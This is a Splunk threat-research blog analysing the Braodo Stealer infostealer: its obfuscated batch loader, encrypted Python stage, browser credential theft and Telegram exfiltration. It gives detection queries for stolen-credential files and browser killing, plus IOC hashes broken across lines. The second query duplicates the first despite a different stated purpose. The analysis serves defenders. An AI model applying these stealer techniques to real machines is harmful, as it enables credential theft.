Splunk Inc.

11/21/2024 | News release | Distributed by Public on 11/21/2024 11:24

Cracking Braodo Stealer: Analyzing Python Malware and Its Obfuscated Loader

Braodo Stealer is one of the many active and evolving malware families designed to steal sensitive information, such as credentials, cookies, and system data, from compromised machines. Typically written in Python, this malware employs a variety of obfuscation techniques to conceal its true intentions, making it challenging for security solutions to identify.

This malware leverages popular developer platforms like GitHub and GitLab for distributing its payloads, often utilizing these repositories to host malicious code disguised as legitimate projects. Furthermore, it employs Telegram bots as command-and-control (C2) channels, allowing attackers to communicate stealthily and exfiltrate stolen data efficiently.

In this blog, the Splunk Threat Research Team will share an analysis of Braodo Stealer. We will break down its loader mechanisms, obfuscation strategies, and payload behavior to provide a clearer understanding of its operations. Additionally, we will share insights into detection techniques and defense strategies to empower security professionals in identifying and mitigating this growing threat effectively.

Code Repositories (T1213)

The Splunk Threat Research Team has observed several active Braodo Stealer campaigns in the wild, abusing popular developer platforms like GitHub and GitLab, which allow developers to create, store, manage, and share their code. These platforms are abused to host and distribute malicious payloads, as seen in various campaigns. Notably, security researchers, including @suyog41, have shared insights into the latest variants of this malware family.

Figure 01 and 02 below highlight one such GitLab and GitHub repository, where an archive package containing the Braodo Stealer payload is stored. This payload is later downloaded by the batch script loader as part of the malware's infection process.

Figure 01: Gitlab that Host Braodo Stealer

Figure 02: Github that Host Braodo Stealer

Loader (Batch Script)

Command Obfuscation (T1027.010)

The Braodo Stealer campaign commonly employs an obfuscated batch script as a loader for its actual Python payload. This batch script utilizes various techniques designed to hinder static analysis, making it more difficult for security researchers to detect and analyze its behavior.

Random Named Environment Variable

Braodo Stealer utilizes randomly named environment variables to obfuscate the actual script it intends to execute. These variables are used to dynamically construct the batch script at runtime, making static analysis significantly more difficult. However, this obfuscation can be reversed using techniques such as string replacement or the print method, as detailed in the Splunk Threat Research Team's blog AsyncRAT Crusade: Detections and Defense.

Figure 03: Random named Environment variable

Byte Order Mark (BOM) and Obfuscator

The Splunk Threat Research Team also observed that Braodo Stealer employed the use of a Byte Order Mark (BOM) in its batch script to deceive text editors and certain command-line tools into interpreting the script as Unicode. This tactic causes the script to appear like gibberish or as though it is written in another language, effectively making it harder to analyze and understand.

Additionally, once the BOM bytes are removed from the batch script, it becomes evident that Braodo Stealer uses an open-source batch script obfuscator called ABOBUS. This obfuscator can apply up to 10 layers of various obfuscation techniques, significantly complicating efforts to recover the original batch script that is set to be executed. These multiple layers of obfuscation are designed to make reverse engineering and analysis more challenging.

Figure 04 provides a screenshot illustrating the appearance of the heavily obfuscated batch script before and after removing the byte order mark bytes.

Figure 04: ABOBUS Obfuscator

Leveraging this information about the obfuscator, the Splunk Threat Research Team was able to hunt for additional new samples with very low detection rates on VirusTotal, as demonstrated in Figure 05. This information shows how this obfuscator is being utilized by threat actors to evade detections.

Figure 05: Threat Hunting Braodo Stealer Loader

By analyzing the code of the ABOBUS obfuscator, the Splunk Threat Research Team was able to deobfuscate the batch script loader, revealing its true intent like what we can see in Figure 06.

The batch script is designed to execute a PowerShell command that downloads the actual payload from a GitLab or GitHub repository, which functions as its C2 server. The downloaded file is a zip archive containing several Python libraries along with a second-stage payload named "rz_317.pd." This Python script is responsible for decrypting and loading the actual Braodo Stealer, completing the infection chain.

Figure 06: Deobfuscated Braodo Stealer "ABOBUS Obfuscated" Loader

Second Stager (Python Script)

Encrypted/Encoded File (T1027.013)

Figure 07 presents a screenshot of the second-stage Python script, which is responsible for base64 decoding and decrypting the AES-encrypted Braodo Stealer payload stored in the "Error_cache.db" file. Once the payload is successfully decoded and decrypted, the script proceeds to execute it, completing the malware's deployment process.

Figure 07: Second Stage Python Script

Braodo Stealer Tactics and Techniques

Registry Run Keys (T1547.001)

Some variants of this Braodo Stealer utilized the registry run keys to gain persistence on the compromised or targeted host to survive or to automatically execute its code upon system boot up.

Figure 08: Registry Run Keys

Screen Capture (T1113)

Figure 09 provides a screenshot showcasing Braodo's functionality for capturing an image of the compromised host's screen. The screenshot is saved as "screenshot.png" in the %temp% folder and is included in the archive of collected data, along with browser credentials, cookies, and other sensitive information.

Figure 9: Screen Capture Capability

Clipboard Data (T1115)

In addition to its screen capture capability, Braodo Stealer also collects clipboard data, which can serve as a valuable source of sensitive information such as usernames and passwords that the user may have copied and pasted on the compromised host.

Figure 10: Collect Clipboard Data

System Information Discovery (T1082)

As part of its beaconing and data exfiltration process, Braodo Stealer gathers various system details, including the country code, city, OS version, username, and hostname. It also collects a list of running processes, which is saved to "%temp%/window.txt" using the tasklist command-line tool. This information is used to better understand the compromised environment and facilitate further malicious actions.

Figure 11: System Information

Figure 12: Process List

Credentials from Web Browsers (T1555.003)

The primary functionality of Braodo Stealer is to collect and exfiltrate credentials, particularly from web browsers. Figure 13 displays a code snippet from one variant of Braodo Stealer, showing its ability to target popular browsers such as Chrome, Firefox, MS Edge, Opera, Brave, and Chromium. The malware decodes and decrypts credentials stored within these browsers. To avoid access errors when extracting encrypted data like master keys and passwords, Braodo Stealer first attempts to terminate the main browser process before proceeding with the decryption.

Figure 13: Targeted Browser

Figure 14 presents a screenshot of the data collected by Braodo Stealer, including decrypted passwords and usernames extracted from targeted web browsers. This information is stored in the %temp% folder, then archived for exfiltration to the malware's C2 server.

Figure 14: Braodo Stealer Collected Data

Exfiltration Over C2 Channel (T1041)

This malware utilizes a Telegram bot as its C2 server, enabling it to transmit all collected sensitive data from the compromised host to the attackers. Telegram's API is leveraged for stealthy and efficient communication.

Figure 15: Telegram Bot C2 server

Detections

Windows Credentials from Web Browsers Saved in TEMP Folder

The following analytic detects the creation of files containing passwords, cookies, and saved login account information by the Braodo Stealer malware in temporary folders. Braodo often collects these credentials from browsers and applications, storing them in temp directories before exfiltration.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("login*", "pass*","cookie*","master_key*") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 16: Windows Credentials from Web Browsers Saved in TEMP Folder Detection

Windows Credentials from Password Stores Chrome Copied in TEMP Folder

The following analytic detects the copying of Chrome's Local State and Login Data files into temporary folders, a tactic often used by the Braodo stealer malware. These files contain encrypted user credentials, including saved passwords and login session details.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("login*", "pass*","cookie*","master_key*") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 17: Windows Credentials from Password Stores Chrome Copied in TEMP Folder

Windows Disable or Stop Browser Process

The following analytic detects the use of the taskkill command in a process command line to terminate several known browser processes, a technique commonly employed by the Braodo stealer malware to steal credentials. By forcefully closing browsers like Chrome, Edge, and Firefox, the malware can unlock files that store sensitive information, such as passwords and login data.

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process = "*taskkill*" Processes.process IN("*chrome.exe","*firefox.exe","*brave.exe","*opera.exe","*msedge.exe","*chromium.exe")
by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id
Processes.parent_process_id
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 18: Windows Disable or Stop Browser Process Detection

Windows Screen Capture in TEMP folder

The following analytic detects the creation of screen capture files by the Braodo Stealer malware. This stealer is known to capture screenshots of the victim's desktop as part of its data theft activities. The detection focuses on identifying unusual screen capture activity, especially when images are saved in directories often used by malware, such as temporary or hidden folders.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("screenshot.png", "screenshot.jpg","screenshot.bmp") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 19: Windows Screen Capture in TEMP Folder Detection

Windows Archived Collected Data In TEMP Folder

The following analytic detects the creation of archived files in a temporary folder, which may contain collected data. This behavior is often associated with malicious activity, where attackers compress sensitive information before exfiltration.

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
where Filesystem.file_name IN ("*.zip", "*.rar", "*.tar", "*.7z") Filesystem.file_path = "*\\temp\\*"
by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`

Figure 20: Windows Archived Collected Data In TEMP Folder Detection

IOCs

Description Hashes
Braodo Stealer batch script loader acd8bcad4e9503790b4fff4f34d860e4e88d0be31b3cf552ca88
76a2b135bcbbafe020b6e94fb55c1e8430894f00da2face01353d
22583c3f09a36fd5c97edc7d68de1e066be502f1725beb21b368f
9f7657bd2239d13cd5d09a512102a0558993cdc922c9ca8167a1d
9995549ed9b92015c4256b168e6fecd50be4774455c0741729ff5
2341713e74ef1fd27cd46fa055569617a349c214e9d8d3013521b
08771afe8a3295930c340bbd0f423a068c39e1733f835141ac21a
dde387ef1e67bbd4b0c3775006d1b40466a97cec3e6d3a974db7f
8ea5aae87efcd739a1f856efacec4df25baa352fb218cda492346
ba7dd08b8215f772a25d7437fc5717318a663b5fef5f87ad0f462
b5db50b3c072357a3df81900eda773077c5c9fa2b90d72a9551a8
a633e4d5a255ba8ddfeeb0de1e6f4a580b02a36814d82a43f29e dce7b9e3464a923e672fc4faf4094f7ac00c2f6bc30bfbb3839b7
7b28dd6f70b93f78966e001e7777efafefdcf88df5c7672620994
9f18e0b0da49610eeb6ec5be640f741511ee53b3518990f1ad8df
4dac0b51016f954f0933f0f2cced5ff863fd36daec14dfb4fa393
b4bbeaecc466631acf3f62e8a7aad2e7ca9c6fafacc937da771ca
eda517fecfc1c2c1e9e6889cd506190ab3335e338dbc00ce41127
99ffe5177ba137139b9f3446c49ee53578c9f2a6530a046f3e392
57cf996e27939c87e032084bc00801e5452fc3776c41786c77dc7
e0b48da46874865f2b262ad8e22ef8807c90598599d99e0953134
171c9976f979aa1dc5785d2d1c3badb4b030e457961692fb84f2b
3324bf770bf8bc3db0bb90e0f13f1cae0a7acbb30777c93649d1a
b663683b4fb7f951ff70c63ec4552aa30d0c70d5041a37b24abee
25d002f74153ebc8416393d0c031db12f5e28166b3f7cc3b70c9b
5131d155e674b6f65f031f8eba7f7a26c1d13c10255cc7e3d0ff2
1bca6343961b8045ff15b348caa50759eed7db38b41c54393df75
c11cac3c1e31f0713d4983f36595f63940322f7505ff5d4a93ff3
33e91f64fe66655fd4e038f68e6e787b39dbd3c4c44a577f6440a
Braodo Python Package (.zip),
which contains the Braodo decryption python script loader and the encrypted Braodo Stealer payload
eebeddcb4c58e04f52d50382dcf13312af9aadd387329841e8e1
7ef81aa24a53306438b870c9488f8a0462cf13b61875121aa2fb
a09ddcc2ea32de61eb8cfa61c9fcc1998332eef1a5b3fe02eb9f
92e9b1922b1a1b8bd255c5ac0e952bfa81ceabe2da23509c5992
c3f204733c67760e6c81cea63253150868823310792547b9897f
9a441154478c080c0e6b59f6a235547f1c99d8dc3dda1a20ef91
71afcc01e3aefcb9bfcee7174c40a7b574706ef841f56c02d26f
8acb6a866fec9bcaa9d9f2b3be8b78427455183bfd5ffae78d11
516e0d12fef631b1eb68e2609e799843f2ecbbd9000709e49f2d
f5a7977577c29d87e9a1dfd5cee8a7fe847d91d2de260fdd42bc
023817ba0b28f21de171f5e2cb8edfd5c5d3c1e46709b6cd22de
20b11a29fc75ea036a3db221aa42dd53e3137614b9c27f6f6df9
5350386521f73117927db7c6920d9133894c2a61c136f6f4d44e
7b1e0eef95edb11f2e0b3870955bdd43095d9fe8a9bfefe40c5f
7f5d82474df7ed87df8e3423c9aefb6264ead34fefea43cdd978
fa4d9c0c35bd040964b6b24483dc28600da0d731b65e8f982ff7
ad10ebd23fbdba7e145d16dbee4b69487c2119aa6641a5177fb3
29f30d2a1139e55964e8bf511108d0142062ce563d83eec9a42a
a21737e41cebbe4e8a17f4484ecea38d3fafb4520db1d60c2e5d
572807b885280195aec1ddc0d3e7e1ec484
Braodo Python Decryptor 80fdf08742c6f90668a7f47d84597075ddd5de2c58ff3acb32fbb
aba6314d285
Braodo Stealer ecd08093eae07e239b70d3d00b90c139173e548c3ec6e39462
e93f4aef101de9

Learn More

This blog helps security analysts, blue teamers and Splunk customers identify Braodo Stealer malware by enabling the community to discover related tactics, techniques, and procedures used by threat actors and adversaries. You can implement the detections in this blog using the Enterprise Security Content Updates app or the Splunk Security Essentials app. To view the Splunk Threat Research Team's complete security content repository, visit research.splunk.com.

Feedback

Any feedback or requests? Feel free to put in an issue on Github and we'll follow up. Alternatively, join us on the Slack channel #security-research. Follow these instructions If you need an invitation to our Splunk user groups on Slack.

Contributors

We would like to thank Teoderick Contreras for authoring this post and the entire Splunk Threat Research Team for their contributions.